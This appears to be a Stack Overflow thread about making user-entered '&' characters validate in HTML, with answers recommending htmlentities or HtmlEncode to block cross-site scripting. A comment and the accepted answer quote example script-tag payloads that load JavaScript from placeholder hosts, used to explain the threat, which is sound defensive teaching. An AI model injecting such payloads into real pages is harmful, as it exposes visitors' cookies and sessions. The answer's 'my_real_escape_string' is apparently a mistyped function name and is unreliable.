# Using an unescaped ampersand, "&"

Tags: html

I have a site where users upload content and they can name what they upload.  Some users have included "&" in their name and I get an html validation error.  Is there any way to allow the "&" to stay and yet also validate the page?  This would be very helpful.  If not, what other measures can I take to allow my page to validate?  Thanks!

Comment: I hate to be one of those guys, but why would you not just escape it to &amp; when rendering the page?

Comment: How would I go about doing that.  Would I run it through a string to find special chars?

Comment: and what happens when a user sets their name to `<script src="http://malicious.com/code.js"></script>Bob`? Make sure you sanitize the crap out of your user inputs.

Comment: why not prompt the user that file name should not contain & or , or " etc.??

Comment: How would I go about escaping it to amp when rendering the page?

Comment: @PeterDuijnstee has the right idea. I mistakingly answered thinking that the url was going to depend on user input, in which case you'd just use encodeURIComponent, but in your case you just need to convert the &'s to &amp;s

Comment: @eggo depends on how you get from user input to page output

Comment: How is the name of an uploaded file related to HTML validation? There is no direct connection. If you generate a link that refers to a resource named by a user, you have many other things to consider as well.

Comment: @zzzzBov At least Bob was nice enough to include some plain text in their name, though. Although to be fair they should have wrapped it in a span or `<p>` for standards..

Comment: @PhillipSchmidt http://xkcd.com/327/ springs to mind. What? It's on topic ;)

Comment: @PeterDuijnstee lol I love that one

Comment: @DhruvenkumarShah that is a very poor way of sanitizing inputs and will still leave you open to XSS attacks.  You should escape all of the html characters, not attempt to blacklist certain ones.

Comment: @nzifnab that is correct. It was just a hint. Not the solution but thanks.

Answer (score 2, accepted):

In php you will want to use the [htmlentities](http://php.net/manual/en/function.htmlentities.php) method:

```
<?= htmlentities($username, ENT_QUOTES) ?>
```

Which will output `me&amp;myself` (the correct way to display the value on the html page) if the user had entered `me&myself`

ALWAYS ALWAYS ALWAYS sanitize user inputs.  Never trust any data that a client's browser has sent you.  If someone entered something in a form field, NEVER stick it directly in a database query (sanitize it with something like `my_real_escape_string($user_input)`).  Never print text to the browser directly if it was originally submitted by a client, always escape it (with `htmlentities`).

The reason you do this is because malicious users could execute cross-site scripting attacks on your site by submitting data that fires some javascript, and phishes or steals data from your other customers.  If I set my name to `<script type='javascript' src='http://mysite.com/bad-js.js' />` then anyone that loaded that page would have that unknown and potentially malicious javascript execute on their browser with access to their cookies and their session.

Comment: That works perfectly.  Thank you very much, and sorry if this was a stupid question.

Comment: I use my_real_escape_string, on everything, I just never realized that I should be using htmlentities before I tried to validate my css.  Also, is it ok if I use htmlentities before I update, or should I always use it when getting the data from mysql?

Comment: I would just use htmlentities when printing it to the page.  You'll want the data exactly as they entered it in the database so that you can do queries like `SELECT * FROM users WHERE username LIKE "bob&friends"`, where if you had already escaped it things like this would fail and return no results.

Comment: That makes a lot of sense.  Thank you very much for the help!

Answer (score 4):

No, there is no way to make the page validate with invalid content.

And, **YOU SHOULD NOT DISPLAY THE CONTENT WITHOUT ENCODING IT PROPERLY!**

Sorry for shouting, but your site is wide open for cross site scripting attacks. Anyone can put harmful content in a name, and it will be run in other peoples browsers.

How you do this depends on what platform you are using. For example in ASP.NET webforms you would use the `Server.HtmlEncode` method to HTML encode the string. In ASP.NET MVC you would use the same, or simply the `<%: %>` server tag that does that automatically.

Comment: Thanks, nzifnab, had the solution, but I do appreciate your help.